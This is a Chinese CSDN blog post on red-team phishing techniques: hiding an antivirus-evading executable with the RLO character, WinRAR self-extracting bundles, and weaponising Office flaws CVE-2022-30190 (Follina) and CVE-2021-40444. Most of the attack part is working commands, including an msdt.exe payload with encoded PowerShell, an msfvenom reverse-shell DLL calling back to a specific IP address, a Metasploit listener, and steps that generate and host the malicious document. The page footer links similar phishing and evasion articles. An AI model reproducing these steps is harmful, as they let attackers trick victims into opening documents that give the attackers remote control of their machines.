【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑

已于 2024-07-03 10:14:34 修改
阅读量1.3k 收藏 4
点赞数
分类专栏: # 红队APT 文章标签: microsoft windows APT Office
于 2023-04-22 19:34:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/130304748
版权

文章目录

文件后缀-钓鱼伪装-RLO

经过免杀后的exe程序(xgpj.exe),进行重命名,在gpl位置插入Unicode控制字符,RLO(从左到右覆盖),如图
在这里插入图片描述
成功上线
在这里插入图片描述
后续修改图标,进行钓鱼伪装

压缩文件-自解压-释放执行

演示环境:Winrar压缩软件

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
打包后进行RLO隐藏,主要是免杀问题

Office套件-CVE漏洞-MSF&CS

Microsoft MSDT CVE-2022-30190 代码执行

https://github.com/JohnHammond/msdt-follina
该漏洞首次发现在2022年5月27日,由白俄罗斯的一个IP地址上传。恶意文档从Word远程模板功能从远程Web服务器检索HTML文件,
通过ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用程序msdt.exe,该程序用于运行各种疑难解答程序包。
此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用ms-msdt URI执行任意PowerShell代码。
目前已知影响的版本为:

office 2021 Lts office 2019 office 2016 Office 2013 Office ProPlus Office 365

测试:

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

复现上线CS:
https://github.com/JohnHammond/msdt-follina
1、生成后门上传
2、构造下载地址
3、修改代码下载
4、生成恶意文档

Microsoft MSHTML CVE-2021-40444 远程代码执行

https://github.com/lockedbyte/CVE-2021-40444

影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本

1、安装依赖:

apt-get install lcab

2、生成DLL:

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=9999 -f dll > shell.dll

3、监听上线:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 9999
run

4、生成文档:

cp shell.dll CVE-2021-40444
cd CVE-2021-40444
python3 exploit.py generate shell.dll http://47.94.236.117:10000

5、监听文档:

python3 exploit.py host 10000

6、取出文档执行测试

CVE-2017-11882

影响版本:
office 2003 office 2007 office 2010 office 2013 office 2016

An0nymouer
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
goby红队&社区版-win-64-2.4.7
11-27
《Goby红队与社区版:安全扫描与漏洞检测的利器》 在网络安全领域,漏洞扫描和安全测试是至关重要的环节。Goby是一款备受瞩目的工具,它为红队(网络安全攻防演练中的攻击方)和社区用户提供了一流的支持。"goby...
红队APT-钓鱼_邮件钓鱼_Ewomail系统_网页克隆
山兔的博客
02-18 1083
以什么理由让对方去下载文件,这个是很重要的,像一些内部部门的话,就是安装和更新一些补丁,或者给对方发送一个动画视频,这个动画视频是不能播放的,类似于gif图片,刚好动画里面有显示你的播放器是坏的,点进去要它更新播放器,然后更新的播放器就是你本地的。网页钓鱼的作用就是截获用户账号密码,控制目标的电脑上线,主要就是看攻击者的目标,或者是什么邮件引起的,如果是发一封打补丁的,那就涉及到文件后门的问题,我发一封商城的,那就是对你的账号感兴趣。我们前期准备的域名要跟我们的目标保持高度的相似性;
漏洞复现:通过CVE-2022-30190上线CS
克格莫
08-09 1579
漏洞复现
钓鱼-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS
weixin_45701675的博客
11-26 1788
钓鱼-利用RLO隐藏exe&文件捆绑&office免杀-远程模板加载上线CS
钓鱼伪装方法3:如何被压缩文件进行钓鱼欺骗
yuanlirong22的专栏
08-26 483
在常规网络攻击无效果时,采取网络钓鱼将是常用且比较有效的方法。这里介绍一种利用压缩文件捆绑木马的方法,方便大家理解并加强防范。
TryHackMe-红队-09_网络钓鱼
M1n9K1n9的博客
01-29 986
在了解什么是网络钓鱼之前,您需要了解术语“社会工程”。社会工程是利用人性的弱点对人们进行心理操纵,以执行或泄露信息。这些“弱点”可以是好奇心、嫉妒、贪婪甚至善良以及帮助某人的意愿。网络钓鱼是通过电子邮件传递的社会工程来源,诱骗某人泄露个人信息、凭据,甚至在他们的计算机上执行恶意代码。这些电子邮件通常看起来来自受信任的来源,无论是个人还是企业。它们包括试图引诱或诱骗人们下载软件、打开附件或点击虚假网站链接的内容。您会遇到一个术语,红队将参与的网络钓鱼活动类型是鱼叉式网络钓鱼,就像投掷物理长矛一样;
文件钓鱼-后缀隐藏&文件捆绑&文件压缩释放技巧
告白的博客
11-19 644
2.杀毒软件也可能会监测文件释放过程: 捆绑器的免杀:腾讯管家杀文件捆绑器,不杀winwar压缩包,换新捆绑器,可以免杀通过腾讯管家 所以捆绑免杀的两个关注点:白名单逻辑捆绑器和木马的免杀。通过测试发现,普通文件rar进行压缩释放,安全软件不会报毒,但是如果是一些其他个人开发的捆绑压缩工具,安全软件会报毒,所以一般选用白名单的工具(不会报毒的捆绑工具)需要注意的是压缩释放后的exe顺序,将木马放在后面,点击释放运行后即可上线,但是缺陷在于,系统会提权询问释放安装运行等字眼,木马文件后缀隐藏,图标修改技巧。
设计&原理&管理 - 安全技术资料汇总(共1份).zip
02-06
4. 红蓝对抗:红队代表攻击者,蓝队代表防御者,这种模拟实战的演练有助于发现并修复安全漏洞。在数据库环境中,红队可能试图通过SQL注入、缓冲区溢出等方式进行攻击,而蓝队则需要强化数据库的防护策略,如使用预...
如何建立企业内部的ATT&CK.pdf
09-13
- **威胁情报**:定期更新ATT&CK矩阵,结合恶意软件、在野漏洞利用和威胁报告。 - **模拟攻击**:进行红队演练,提升ATT&CK覆盖率。 - **合规性**:将ATT&CK与NIST 800-53、PCI DSS等标准映射,协助合规工作。 - **...
原子红队:基于MITRE的ATT&CK的小型且高度便携式的检测测试
02-12
原子红队 原子红队允许每个安全团队通过执行简单的“原子测试”来测试其控件,这些“原子测试”使用与对手所使用的技术相同的技术(均映射到 )。 哲学 Atomic Red Team是一个简单测试库,每个安全团队都可以执行...
ATT&CK.红队战术漫谈.pdf
09-09
ATT&CK.红队战术漫谈
红队APT——网络钓鱼SPF&Swaks&Gophish
m0_61506558的博客
02-06 885
发件人策略框架(SeAder Policy Framework) 电子邮件认证机制,中文译为发送方策略框架,主要作用是防止伪造邮件地址。标题3、配置触发页面(钓鱼用)4、配置收信人地址(批量套)
红队简单钓鱼实战---office
LvHLong的博客
05-30 1376
前言 本文发布已获得本人授权 ,本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、office宏介绍 宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。 宏病毒是一种常见的计算机病毒,......
用Winrar打造永不被杀的免杀捆绑
宁不凡的博客
08-25 3978
首先将需要捆绑的图片与程序复制一份到桌面(目的是同目录就行了,不一定要桌面。)   按住键盘的ctrl键,鼠标左键单击选中图片与程序。 如图所示:   然后在任意图标上单击右键,选择如下           (打开自动解压到系统的temp文件夹里,你也可以填写其他路径。)           (这里是文件的ico图标,自己拿图片...
TideSec远控免杀学习一(免杀基础+msfvenom隐藏的参数)
fa1lr4in的小博客
02-08 2646
参考链接:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 参考资料 免杀技术有一套:https://anhkgg.com/aanti-virus/ Meterpreter免杀及对抗分析:https://www.freebuf.com/sectool/157122.html 免杀艺术:https://www.4hou.com/technol...
文件名伪装_RLO红队钓鱼
qq_44657899的博客
01-25 1683
Rlo,即Right-to-LeftOverride 在文件名中插入此类unicode字符,来达到文件名反转的效果 将exe文件命名为mdgnp.exe,然后重命名选中md和gnp,之间插入Unicode控制字符RLO 保存文件名,然后更换图标即可
CVE-2021-40444_复现
PureDust的博客
09-14 924
CVE-2021-40444_Microsoft MSHTML 远程代码执行复现准备上线设置cs,powershell,端口设置了8080复制word_dat为tmp_doc制作dll文件 准备 1.下载github的代码 https://github.com/lockedbyte/CVE-2021-40444 2.安装lcab sudo apt-get install lcab 3.安装编译环境 apt-get install mingw-w64 上线 设置cs,powershell,端口设置了808
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
最新发布
lw19155275856的博客
03-14 206
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
红队APT——邮件钓鱼攻击Swaks&Office漏洞&RLO隐藏&压缩释放
m0_61506558的博客
03-05 858
漏洞首次发现在2022年5月27日,由白俄罗斯的一个IP地址上传。恶意文档从Word远程模板功能从远程Web服务器检索HTML文件,通过ms-msdt MSProtocol URI 方法来执行恶意PowerShell代码。感染过程利用程序msdt.exe,该程序用于运行各种疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用ms-msdt URI执行任意PowerShell代码。
红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
11-16
反朔源是指攻击者在攻击时使用了一些技术手段来隐藏攻击者的真实IP地址,使得受害者***指在网络传输过程中对数据进行加密,使得攻击者无法窃取数据或者窃取到的数据无法被解密。常见的流量加密技术包括SSL、TLS等。 CS和MSF是两种常见的渗透测试工具,分别是Cobalt Strike和Metasploit Framework的缩写。这两个工具都可以用于渗透测试和红队行动。 证书指纹是指数字证书中的一个唯一标识,可以用于验证数字证书的真实性。常见的证书指纹算法包括SHA-1、SHA-256等。 C2项目是指命令与控制(Command and Control)项目,是指攻击者通过控制恶意软件的C2服务器来控制受害者的计算机。 CDN域前置是指攻击者通过在攻击流量中添加CDN前置节点,来绕过一些安全防护措施,使得攻击流量更难被检测和阻止。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值